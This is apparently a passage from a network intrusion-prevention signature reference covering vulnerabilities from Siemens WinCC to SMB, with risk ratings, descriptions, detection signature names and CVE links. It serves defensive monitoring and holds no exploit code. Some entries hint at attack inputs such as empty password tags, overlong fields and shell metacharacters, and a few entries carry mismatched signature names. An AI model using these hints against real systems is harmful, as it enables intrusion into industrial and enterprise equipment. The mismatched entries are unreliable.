A stack-based buffer overflow vulnerability has been reported in Siemens Tecnomatix Plant Simulation. This vulnerability is due to insufficient validation of the length of an attribute name in the array_carr object within an SPP file. A remote attacker can exploit this vulnerability by enticing the victim to open a crafted SPP file. Successful exploitation of this vulnerability can result in arbitrary code execution under the security context of the user.

Situation:

File-OLE_Siemens-Tecnomatix-Plant-Simulation-Spp-File-Parsing-Stack-Buffer-Overflow

References:

CVE-2023-27404
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-27404

Siemens-WinCC-Hard-Coded-Login

About this vulnerability:

Hard-coded login credentials for Siemens WinCC

Risk:

High

First detected in:

sgpkg-ips-616-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Siemens SIMATIC WinCC

Type:

Backdoor

Description:

There are hard-coded credentials in Siemens SIMATIC WinCC allowing any user to access backend database and perform privilege escalation.

Situation:

MSSQL_Siemens-WinCC-Hard-Coded-Login

References:

CVE-2010-2772
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2772

BID-41753
http://www.securityfocus.com/bid/41753

Siemens-WinCC-MiniWeb-Denial-Of-Service

About this vulnerability:	Siemens WinCC flixible runtime 2008 SP2 + SP 1, miniweb.exe Denial of Service
Risk:	High
First detected in:	sgpkg-ips-627-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	MiniWeb
Type:	Malfunction
Description:	A vulnerability in Siemens WinCC miniweb.exe that allows a remote attacker to crash the service by sending a specially crafted HTTP POST request.
Situation:	HTTP_CSU-Siemens-WinCC-MiniWeb-Denial-Of-Service

Siemens-WinCC-TIA-Portal-MiniWeb-DoS

About this vulnerability:	A vulnerability in Siemens WinCC TIA Portal, allowing DoS.
Risk:	High
First detected in:	sgpkg-ips-615-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	Siemens WinCC TIA Portal
Type:	Malfunction
Description:	The Siemens WinCC TIA Portal software is vulnerable to specially crafted HTTP POST requests, allowing an attacker to carry out a DoS attack, either crashing the miniweb.exe web application or consuming most of CPU resources.
Situation:	HTTP_CS-Siemens-WinCC-TIA-Portal-MiniWeb-DoS

Sierra-Wireless-ALEOS-Acemanager-Cross-Site-Scripting-CVE-2023-40461

About this vulnerability:

A vulnerability in ALEOS ACEManager

Risk:

High

First detected in:

sgpkg-ips-1664-5242

Last changed:

sgpkg-ips-1664-5242

Platform:

Generic

Software:

ALEOS

Type:

Cross-site Scripting

Description:

A stored cross-site scripting vulnerability has been reported in the ACEManager component of Sierra Wireless ALEOS Application Framework 4.16 and earlier.

Situation:

HTTP_CRL-Sierra-Wireless-ALEOS-Acemanager-Cross-Site-Scripting-CVE-2023-40461

References:

CVE-2023-40461
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-40461

Sierra-Wireless-ALEOS-Acemanager-Denial-Of-Service-CVE-2023-40459

About this vulnerability:

A vulnerability in ALEOS ACEManager

Risk:

High

First detected in:

sgpkg-ips-1663-5242

Last changed:

sgpkg-ips-1663-5242

Platform:

Generic

Software:

ALEOS

Type:

Malfunction

Description:

A denial of service vulnerability has been reported in the ACEManager component of Sierra Wireless ALEOS Application Framework 4.16 and earlier. An unauthenticated attacker can exploit this vulnerability by sending a crafted login request with an empty password tag.

Situation:

HTTP_CRL-Sierra-Wireless-ALEOS-Acemanager-Denial-Of-Service-CVE-2023-40459

References:

CVE-2023-40459
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-40459

Sierra-Wireless-ALEOS-Acemanager-File-Upload-CVE-2023-40460

About this vulnerability:

A vulnerability in ALEOS ACEManager

Risk:

High

First detected in:

sgpkg-ips-1664-5242

Last changed:

sgpkg-ips-1715-5242

Platform:

Generic

Software:

ALEOS

Type:

Input Validation

Description:

A file upload vulnerability has been reported in the ACEManager component of Sierra Wireless ALEOS Application Framework 4.16 and earlier. An authenticated attacker can upload arbitrary HTML and script content due to the improper validation of the uploaded file names and types. If the uploaded file has the same name as a legitimate ACEManager web page, the malicious version will be served instead of the original one.

Situation:

HTTP_CS-Sierra-Wireless-ALEOS-Acemanager-File-Upload-CVE-2023-40460
File-TextId_Sierra-Wireless-ALEOS-Acemanager-File-Upload-CVE-2023-40460

References:

CVE-2023-40460
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-40460

Simple-PHP-Blog-Remote-Command-Execution

About this vulnerability:

A Simple PHP Blog Remote Command Execution vulnerability.

Risk:

High

First detected in:

sgpkg-ips-747-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Simple PHP Blog

Type:

Input Validation

Description:

A vulnerability in Simple PHP Blog, versions 0.4.0 and before, where file extensions of uploaded files in upload_img_cgi.php are not properly restricted, which allows remote attackers to execute arbitrary code.

Situation:

HTTP_CS-Simple-PHP-Blog-Remote-Command-Execution

References:

CVE-2005-2733
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2733

BID-14667
http://www.securityfocus.com/bid/14667

OSVDB-19012
http://www.osvdb.org/19012

SimpleHelp-Unauthenticated-Path-Traversal-CVE-2024-57727

About this vulnerability:

An attempt to exploit a vulnerability in SimpleHelp Remote Support detected

Risk:

High

First detected in:

sgpkg-ips-1830-5242

Last changed:

sgpkg-ips-1830-5242

Platform:

Generic

Software:

SimpleHelp Remote Support

Type:

Input Validation

Description:

SimpleHelp remote support software v5.5.7 and before is vulnerable to multiple path traversal vulnerabilities that enable unauthenticated remote attackers to download arbitrary files from the SimpleHelp host via crafted HTTP requests. These files include server configuration files containing various secrets and hashed user passwords.

Situation:

HTTP_CSU-SimpleHelp-Unauthenticated-Path-Traversal-CVE-2024-57727

References:

CVE-2024-57727
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-57727

SIP-Cisco-IP-Phone-Invite-IP-Address-Denial-Of-Service

About this vulnerability:

A denial of service vulnerability in Cisco IP phones

Risk:

Low

First detected in:

sgpkg-ips-146-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Cisco

Software:

<os>

Type:

Malfunction

Description:

Cisco IP Phones 7960 and 7940 suffer from a denial of service vulnerability where a malformed SIP INVITE message can cause the phone to crash. A remote attacker can trigger the vulnerability by sending a SIP INVITE message containing a broken IP addresses string.

Situation:

SIP-UDP_CS-Invite-Message-With-Broken-IP-Addresses

References:

CVE-2007-1542
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1542

BID-23047
http://www.securityfocus.com/bid/23047

SIP-Digium-Asterisk-Invalid-RTP-Payload-Type-Number-Memory-Corruption

About this vulnerability:

A memory corruption vulnerability in Digium Asterisk

Risk:

High

First detected in:

sgpkg-ips-150-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Digium Asterisk

Type:

Malfunction

Description:

There is a memory corruption vulnerability in Digium Asterisk. A remote unauthenticated attacker can exploit this vulnerability by sending a malicious SIP INVITE request with an invalid RTP payload type number to terminate the affected service or to execute arbitrary code with the privileges of the running service.

Situation:

Generic_UDP-Digium-Asterisk-Invalid-RTP-Payload-Type-Number-Memory-Corruption
SIP-UDP_CS-Digium-Asterisk-Invalid-RTP-Payload-Type-Number-Memory-Corruption

References:

CVE-2008-1289
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1289

BID-28308
http://www.securityfocus.com/bid/28308

OSVDB-43416
http://www.osvdb.org/43416

SIP-Digium-Asterisk-Multiple-SDP-Parameters-Parsing-Buffer-Overflow

About this vulnerability:

A buffer overflow vulnerability in Digium Asterisk SDP parameters parsing code

Risk:

High

First detected in:

sgpkg-ips-150-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Linux

Software:

Digium Asterisk

Type:

Buffer Overflow

Description:

Digium Asterisk versions earlier than 1.4.3 suffer from multiple buffer overflow vulnerabilities related to SIP message parsing. Long values passed to the SDP parameters T38FaxRateManagement or T38FaxUdpEC may trigger a stack-based buffer overflow, allowing remote attackers to execute arbitrary code.

Situation:

SIP-TCP_CS-Digium-Asterisk-Multiple-SDP-Parameters-Parsing-Buffer-Overflow-2
SIP-UDP_CS-Digium-Asterisk-Multiple-SDP-Parameters-Parsing-Buffer-Overflow-2

References:

CVE-2007-2293
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2293

BID-23648
http://www.securityfocus.com/bid/23648

OSVDB-35368
http://www.osvdb.org/35368

Siretta-Quartz-Gold-Router-OS-Command-Injection

About this vulnerability:

A vulnerability in Siretta QUARTZ-GOLD

Risk:

High

First detected in:

sgpkg-ips-1650-5242

Last changed:

sgpkg-ips-1650-5242

Platform:

Generic

Software:

Siretta QUARTZ-GOLD

Type:

Input Validation

Description:

An OS command injection vulnerability has been reported in the delfile.cgi HTTP server component of the Siretta QUARTZ-GOLD industrial routers.

Situation:

HTTP_CRL-Siretta-Quartz-Gold-Router-OS-Command-Injection

References:

CVE-2022-40969
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-40969

Siretta-Quartz-Gold-Router-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in Siretta QUARTZ-GOLD

Risk:

High

First detected in:

sgpkg-ips-1650-5242

Last changed:

sgpkg-ips-1650-5242

Platform:

Generic

Software:

Siretta QUARTZ-GOLD

Type:

Buffer Overflow

Description:

A stack buffer overflow vulnerability has been reported in the downfile.cgi HTTP server component of the Siretta QUARTZ-GOLD industrial routers. Successful exploitation of this vulnerability could lead to remote code execution.

Situation:

HTTP_CRL-Siretta-Quartz-Gold-Router-Stack-Buffer-Overflow

References:

CVE-2022-38459
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-38459

Sitecom-Home-Storage-Center-Directory-Traversal

About this vulnerability:

A vulnerability in Sitecom Home Storage Center

Risk:

High

First detected in:

sgpkg-ips-609-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Sitecom Home Storage Center

Type:

Malfunction

Description:

There is a directory traversal vulnerability in Sitecom Home Storage Center which allows attackers to download arbitrary files without authorization.

Situation:

HTTP_CRL-Sitecom-Home-Storage-Center-Directory-Traversal

References:

OSVDB-85176
http://www.osvdb.org/85176

Sitecore-Experience-Platform-Preauth-Deserialization-RCE

About this vulnerability:

A vulnerability in Sitecore XP.

Risk:

High

First detected in:

sgpkg-ips-1431-5242

Last changed:

sgpkg-ips-1431-5242

Platform:

Generic

Software:

Sitecore XP

Type:

Insecure Configuration

Description:

A vulnerability in Sitecore XP, versions 7.5 to 7.5.2, 8.0 to 8.0.7, 8.1 to 8.1.3, and 8.2 to 8.2.7, which allows remote attackers to execute arbitrary code through the Report.ashx page due to improper authentication checks.

Situation:

HTTP_CS-Sitecore-Experience-Platform-Preauth-Deserialization-RCE

References:

CVE-2021-42237
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42237

Sitecore-Multiple-Products-ThumbnailsAccessToken-Insecure-Deserialization

About this vulnerability:

A vulnerability in Sitecore Experience Manager

Risk:

Moderate

First detected in:

sgpkg-ips-1857-5242

Last changed:

sgpkg-ips-1857-5242

Platform:

Generic

Software:

Sitecore XP

Type:

Input Validation

Description:

Deserialization of unverified data when handling ThumbnailsAccessToken value causes a vulnerability in Sitecore. A successful exploitation allows an attacker to execute arbitrary code on the target system.

Situation:

HTTP_CSH-Sitecore-Multiple-Products-ThumbnailsAccessToken-Insecure-Deserialization-CVE-2025-27218

References:

CVE-2025-27218
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-27218

Sitecore-XP-Insecure-Deserialization

About this vulnerability:

An attempt to exploit a vulnerability in Sitecore XP detected

Risk:

High

First detected in:

sgpkg-ips-1401-5242

Last changed:

sgpkg-ips-1476-5242

Platform:

Windows

Software:

Sitecore XP

Type:

Malfunction

Description:

An attempt to exploit a vulnerability in Sitecore XP detected. The vulnerable url is deprecated in the fixed version 8.0 of Sitecore XP.

Situation:

HTTP_CSU-Sitecore-XP-Insecure-Deserialization

References:

CVE-2021-42237
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42237

SixApart-Movable-Type-Code-Execution

About this vulnerability:

A SixApart Movable Type Code Execution vulnerability.

Risk:

High

First detected in:

sgpkg-ips-739-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Movable Type

Type:

Input Validation

Description:

A vulnerability in SixApart Movable Type, versions 5.2.12 and earlier, which allows remote attackers to include and execute arbitrary local Perl files and possible execute arbitrary code.

Situation:

HTTP_CSU-SixApart-Movable-Type-Code-Execution

References:

CVE-2015-1592
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1592

SkyBlueCanvas-CMS-Command-Execution

About this vulnerability:

A SkyBlueCanvas CMS Command Execution vulnerability.

Risk:

High

First detected in:

sgpkg-ips-699-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

SkyBlueCanvas CMS

Type:

Input Validation

Description:

A vulnerability in SkyBlueCanvas CMS, versions before 1.1 r248-04, which allow remote attackers to execute arbitrary commands via shell metacharacters in the name, email, subject, or message parameter to index.php when the pid parameter is 4.

Situation:

HTTP_CRL_SkyBlueCanvas-CMS-Command-Execution

References:

CVE-2014-1683
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1683

BID-65129
http://www.securityfocus.com/bid/65129

OSVDB-102586
http://www.osvdb.org/102586

SKYPE-Network-Usage

About this vulnerability:	Skype network usage
Risk:	Moderate
First detected in:	sgpkg-ips-22-1210
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Skype
Type:	Instant Messenger
Description:	The Skype network can be used for audio conversations, instant messaging and file transfers among users.
Situation:	HTTP_CS-SKYPE-Client-Installed HTTP_CS-Skype-Client-Version-Check IM-TCP_SKYPE-Login

SKYPE-Skype4com-URI-Handler-Remote-Heap-Corruption

About this vulnerability:

A heap corruption vulnerability in Skype

Risk:

Moderate

First detected in:

sgpkg-ips-136-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Skype

Type:

Input Validation

Description:

There is a heap corruption vulnerability in Skype. The vulnerability is due to a boundary error when processing crafted URL parameters. An attacker could exploit this vulnerability by enticing the target user to visit a malicious web page.

Situation:

HTTP_SS-SKYPE-Skype4com-URI-Handler-Remote-Heap-Corruption
File-Text_SKYPE-Skype4com-URI-Handler-Remote-Heap-Corruption

References:

CVE-2007-5989
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5989

BID-26748
http://www.securityfocus.com/bid/26748

OSVDB-39170
http://www.osvdb.org/39170

Skywiper-B-Trojan

About this vulnerability:	Skywiper.B Trojan
Risk:	High
First detected in:	sgpkg-ips-618-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Code Injection
Description:	Skywiper.B is an espionage program that spies on the user in multiple ways. It can spread through local network or USB stick.
Situation:	HTTP_CSU-Skywiper-B-Trojan-Activity-Detected

Skyworth-GPON-HomeGateways-And-Optical-Network-Terminals-Stack-Overflow

About this vulnerability:

An attempt to exploit a vulnerability in a Shenzhen Skyworth device detected

Risk:

High

First detected in:

sgpkg-ips-1771-5242

Last changed:

sgpkg-ips-1771-5242

Platform:

Generic

Software:

Shenzhen Skyworth

Type:

Input Validation

Description:

A vulnerability in multiple Shenzhen Skyworth devices which allows remote attackers to cause a denial of service condition or possibly execute arbitrary code via a long password, due to the insufficient validation in the Web_passwd function.

Situation:

HTTP_CRL-Skyworth-GPON-HomeGateways-And-Optical-Network-Terminals-Stack-Overflow

References:

CVE-2018-19524
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-19524

SLMail-POP3-Server-Password-BOF

About this vulnerability:

Buffer overflow in SLMail POP3 server

Risk:

High

First detected in:

sgpkg-ips-279-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

BVRP Software SLMail

Type:

Buffer Overflow

Description:

SLMail is vulnerable to a stack-based buffer overflow, caused by a vulnerability in the POP3 server. By submitting an overly long password during authentication, a remote attacker could overflow a buffer and execute arbitrary code on the server.

Situation:

POP3_MailEnable-POP-Service-Pass-Command-Buffer-Overflow

References:

CVE-2003-0264
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0264

BID-7519
http://www.securityfocus.com/bid/7519

OSVDB-11975
http://www.osvdb.org/11975

Slowloris-HTTP-DOS-Tool

About this vulnerability:

Slowloris HTTP DOS

Risk:

High

First detected in:

sgpkg-ips-281-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Any Operating System

Software:

<os>

Type:

Malfunction

Description:

Slowloris is denial of service tool that sends partial HTTP requests causing the HTTP server to slowly run out of resources

Situation:

HTTP_CS-Slowloris-DOS

References:

CVE-2007-0086
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0086

OSVDB-33457
http://www.osvdb.org/33457

Smail-3-Mail-From-BOF

About this vulnerability:

Buffer overflow in Smail-3

Risk:

High

First detected in:

sgpkg-ips-44-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Unix

Software:

Smail-3

Type:

Buffer Overflow

Description:

Smail-3 Mail Transport Agent contains a buffer overflow. A remote attacker could send an e-mail with a specially-crafted MAIL FROM field that overflows the buffer and allows arbitrary code execution with root privileges on the vulnerable server.

Situation:

SMTP_Smail-3-Mail-From-BOF2
SMTP_Smail-3-Mail-From-BOF

References:

CVE-2005-0892
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0892

BID-12899
http://www.securityfocus.com/bid/12899

OSVDB-15065
http://www.osvdb.org/15065

Small-AVI-Container

About this vulnerability:	Detects tiny RIFF-AVI video containers
Risk:	Low
First detected in:	sgpkg-ips-490-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	<os>
Type:	Malfunction
Description:	Presenting real animated content within smaller than 1 kB binary video container is very unlikely. This may indicate a client-side memory corruption or code injection attempt, such as CVE-2009-1546.
Situation:	SMTP_CS-Small-AVI-Container IMAP_SS-Small-AVI-Container POP3_SS-Small-AVI-Container File-RIFF_Small-AVI-Container

Small-HTTP-Server-Msdos-Device-Name-DoS

About this vulnerability:

Denial of Service (DoS) vulnerability in Small HTTP server

Risk:

Low

First detected in:

sgpkg-ips-18-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows 95; Windows 98

Software:

Max Feoktistov Small HTTP server

Type:

Malfunction

Description:

Small HTTP Server is vulnerable to a Denial of Service (DoS) attack. An attacker can send a URL request appended with MSDOS device name to the server to cause the server to crash.

Situation:

HTTP_CRL-Smart-Software-Solutions-Codesys-Controlservice-Stack-Buffer-Overflow

References:

CVE-2001-0493
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0493

BID-2649
http://www.securityfocus.com/bid/2649

OSVDB-1803
http://www.osvdb.org/1803

Smart-Install-Exploitation-Tool

About this vulnerability:	An exploitation tool for Cisco Smart Install (SMI)
Risk:	High
First detected in:	sgpkg-ips-1061-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Cisco SMI
Type:	Misconfiguration
Description:	The Smart Install Exploitation Tool (SIET) exploits the Cisco Smart Install Client protocol.
Situation:	Generic_TCP-SIET-Get_Config-Command Generic_TCP-SIET-Change_Config-Command Generic_TCP-SIET-Update_ios-And-Execute-Command

Smart-Software-Solutions-Codesys-Controlservice-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in Smart Software Solutions CoDeSys

Risk:

Moderate

First detected in:

sgpkg-ips-615-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Smart Software Solutions CoDeSys

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability has been identified in the ControlService component (CoDeSysControlService.exe) of Smart Software Solutions CoDeSys. The vulnerability is due to a boundary error when handling HTTP requests. Remote attackers could exploit this vulnerability by sending crafted requests to the vulnerable service. In a successful attack scenario, the attacker can execute arbitrary code within the context of the service which is SYSTEM. In an unsuccessful attack the process will terminate abnormally causing a denial-of-service condition.

Situation:

References:

CVE-2011-5007
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-5007

BID-50849
http://www.securityfocus.com/bid/50849

OSVDB-77387
http://www.osvdb.org/77387

Smart-Software-Solutions-Codesys-ENI-Server-Stack-Buffer-Overflow

About this vulnerability:	A vulnerability in CoDeSys ENI Server
Risk:	High
First detected in:	sgpkg-ips-607-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	Smart Software Solutions CoDeSys
Type:	Buffer Overflow
Description:	There is a stack buffer overflow vulnerability in in Codesys ENI server which allows remote attacker to execute malicious code on target system.
Situation:	HTTP_CSU-Smart-Software-Solutions-Codesys-ENI-Server-Stack-Buffer-Overflow

Smart-Software-Solutions-Codesys-Gateway-Server-Heap-Buffer-Overflow

About this vulnerability:

A vulnerability in Smart Software Solutions CoDeSys

Risk:

Moderate

First detected in:

sgpkg-ips-522-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Smart Software Solutions CoDeSys

Type:

Buffer Overflow

Description:

There is a heap buffer overflow vulnerability in 3S Smart Software CoDeSys. The vulnerability is due to insufficient input validation when parsing requests and allows overflowing a heap buffer. A remote unauthenticated attacker could exploit this vulnerability by sending crafted requests to the vulnerable service on ports 1211/TCP and 1210/TCP. Successful exploitation could result in code execution with SYSTEM privileges. Unsuccessful attack attempts could cause the affected service to terminate abnormally, causing a denial of service (DoS) condition.

Situation:

Generic_CS-Smart-Software-Solutions-Codesys-Gateway-Server-Heap-Buffer-Overflow

References:

CVE-2012-4706
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4706

OSVDB-90369
http://www.osvdb.org/90369

Smart-Software-Solutions-Codesys-Gateway-Server-Integer-Overflow

About this vulnerability:

A vulnerability in Smart Software Solutions CoDeSys

Risk:

Moderate

First detected in:

sgpkg-ips-429-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Smart Software Solutions CoDeSys

Type:

Integer Overflow

Description:

An integer overflow vulnerability has been identified in the Gateway Server component of Smart Software Solutions CoDeSys. The vulnerability is due to a lack of validation of a user-provided length value which causes heap corruption. Remote attackers could exploit this vulnerability by sending crafted requests to the vulnerable service. In a successful attack scenario, the attacker can execute arbitrary code within the context of the service, which is SYSTEM. In an unsuccessful attack the process will terminate abnormally, causing a denial-of-service condition.

Situation:

Generic_CS-Smart-Software-Solutions-Codesys-Gateway-Server-Integer-Overflow

References:

BID-50849
http://www.securityfocus.com/bid/50849

OSVDB-77386
http://www.osvdb.org/77386

Smart-Software-Solutions-Codesys-Gateway-Server-Traversal

About this vulnerability:

A vulnerability in Codesys Gateway server

Risk:

High

First detected in:

sgpkg-ips-608-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Smart Software Solutions CoDeSys

Type:

Buffer Overflow

Description:

There is a directory traversal vulnerability in in Smart Software Solutions CoDeSys which allows remote attacker to execute malicious code on target system.

Situation:

Generic_CS-Smart-Software-Solutions-Codesys-Gateway-Server-Traversal

References:

CVE-2012-4705
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4705

Smart-Software-Solutions-Codesys-Webserver-Stack-Buffer-Overflow

About this vulnerability:	A vulnerability in CoDeSys Webserver
Risk:	High
First detected in:	sgpkg-ips-608-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	Smart Software Solutions CoDeSys
Type:	Buffer Overflow
Description:	There is a stack buffer overflow vulnerability in in Codesys Webserver which allows remote attacker to execute malicious code on target system.
Situation:	HTTP_CSU-Smart-Software-Solutions-Codesys-Webserver-Stack-Buffer-Overflow

Smartertools-Smartermail-Message-Onerror-Stored-Cross-Site-Scripting

About this vulnerability:

A vulnerability in SmarterTools SmarterMail

Risk:

Moderate

First detected in:

sgpkg-ips-1406-5242

Last changed:

sgpkg-ips-1406-5242

Platform:

Generic

Software:

SmarterTools SmarterMail

Type:

Input Validation

Description:

Insufficient validation of email message contents causes a cross-site scripting vulnerability in SmarterTools SmarterMail.

Situation:

File-Text_Smartertools-Smartermail-Message-Onerror-Stored-Cross-Site-Scripting

References:

CVE-2021-35519
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-35519

SmartScreen-Security-warning-Bypass-For-MSI-Files-CVE-2023-24880

About this vulnerability:

An attempt to exploit a vulnerability in SmartScreen detected

Risk:

High

First detected in:

sgpkg-ips-1565-5242

Last changed:

sgpkg-ips-1580-5242

Platform:

Windows

Software:

SmartScreen

Type:

Input Validation

Description:

An MSI signed with an invalid authenticode signature bypasses the SmartScreen Security Warning dialog. This behavior is currently exploited in the wild to deliver the Magniber ransomware.

Situation:

File-Text_SmartScreen-Security-warning-Bypass-For-Script-Files-CVE-2023-24880
File-OLE_SmartScreen-Security-warning-Bypass-For-MSI-Files-CVE-2023-24880
File-Exe_SmartScreen-Security-warning-Bypass-For-PE-Files-CVE-2023-24880

References:

CVE-2023-24880
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-24880

ms23-mar
http://technet.microsoft.com/security/bulletin/ms23-mar

Smartstore-Smartstorenet-Forumpost-Stored-Cross-Site-Scripting

About this vulnerability:

A vulnerability in smartstore SmartStoreNET

Risk:

Moderate

First detected in:

sgpkg-ips-1411-5242

Last changed:

sgpkg-ips-1411-5242

Platform:

Generic

Software:

SmartStoreNET

Type:

Input Validation

Description:

Improper input validation of user input in forum posts causes a cross-site scripting vulnerability in SmartStoreNet. A successful exploit allows an attacker to execute arbitrary code in a user's browser.

Situation:

HTTP_CRL-Smartstore-Smartstorenet-Forumpost-Stored-Cross-Site-Scripting

References:

CVE-2021-32608
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-32608

Smartstore-Smartstorenet-Privatemessages-Stored-Cross-Site-Scripting

About this vulnerability:

A vulnerability in smartstore SmartStoreNET

Risk:

Moderate

First detected in:

sgpkg-ips-1412-5242

Last changed:

sgpkg-ips-1412-5242

Platform:

Generic

Software:

SmartStoreNET

Type:

Input Validation

Description:

Improper validation of user input in forum posts causes a cross-site scripting vulnerability in SmartStoreNet. A successful exploit allows an attacker to execute arbitrary code in a user's browser.

Situation:

HTTP_CRL-Smartstore-Smartstorenet-Privatemessages-Stored-Cross-Site-Scripting

References:

CVE-2021-32607
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-32607

Smarty-Template-Engine-Sandbox-Escape-CVE-2021-26119

About this vulnerability:

An attempt to exploit a vulnerability in Smarty detected

Risk:

High

First detected in:

sgpkg-ips-1852-5242

Last changed:

sgpkg-ips-1852-5242

Platform:

Generic

Software:

Smarty

Type:

Input Validation

Description:

Smarty before 3.1.39 allows a sandbox escape because "$smarty.template_object" can be accessed in the sandbox mode.

Situation:

HTTP_CRL-Smarty-Template-Engine-Sandbox-Escape-CVE-2021-26119

References:

CVE-2021-26119
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26119

SMB-AndX-Chain

About this vulnerability:	An SMB AndX chain was detected
Risk:	Moderate
First detected in:	sgpkg-ips-425-4219
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	<os>
Type:	Format String
Description:	An SMB AndX chain was detected
Situation:	SMB-TCP_CHS-SMB-AndX-Chain

SMB-Client-Memory-Allocation-CVE-2010-0269

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

Critical

First detected in:

sgpkg-ips-300-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows 2000; Windows XP; Windows 2003; Windows Vista; Windows 2008; Windows 7

Software:

<os>

Type:

Input Validation

Description:

There is a client-side vulnerability in Microsoft Windows SMBv1. When exploited successfully, the vulnerability allows code execution in ring0 context.

Situation:

SMB-TCP_SMB-Client-Memory-Allocation-CVE-2010-0269

References:

CVE-2010-0269
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0269

MS10-020
http://technet.microsoft.com/security/bulletin/MS10-020

SMB-Failed-Session-Setup

About this vulnerability:	SMB Session Setup was denied
Risk:	Low
First detected in:	sgpkg-ips-126-2032
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	<os>
Type:	Failed Login
Description:	Server Message Protocol (SMB) is a networking protocol that allows remote computers to share resources. It is an internal part of all Windows operating systems, and it has been implemented in various other operating systems to improve networking with the Windows operating systems. Session Setup is a necessary step when communicating using SMB. The failure of the session setup means that someone has tried to access remote computer resources, for example a remote logon, without sufficient privileges. If this happens many times, it can indicate a brute force attack or some misconfiguration.
Situation:	SMB-TCP_Failed-Session-Setup

SMB-Filename-Obfuscation

About this vulnerability:	An obfuscated filename was found in a SMB message
Risk:	Low
First detected in:	sgpkg-ips-427-4219
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	<os>
Type:	Insecure Configuration
Description:	An obfuscated filename was found in a SMB message
Situation:	SMB-TCP_CHS-SMB-Filename-Obfuscation

SMB-Multiple-Tree-Connections

About this vulnerability:	An unusual situation in an SMB session
Risk:	Low
First detected in:	sgpkg-ips-431-4219
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	<os>
Type:	Insecure Configuration
Description:	An unusual situation in an SMB session
Situation:	SMB-TCP_SHS-Multiple-Tree-Connections

SMB-NetBIOS-Request-Buffer-Overflow

About this vulnerability:

Buffer overflow in Microsoft's SMB implementation.

Risk:

Moderate

First detected in:

sgpkg-ips-9-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows NT; Windows 2000; Windows XP

Software:

<os>

Type:

Buffer Overflow

Description:

Due to a flaw in Microsoft's SMB implementation, an attacker can send a specifically crafter packet which can crash the target host. It has not been confirmed whether this vulnerability can be used to execute arbitrary commands.

Situation:

SMB-TCP_CHS-Request-Buffer-Overflow

References:

CVE-2002-0724
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0724

BID-5556
http://www.securityfocus.com/bid/5556
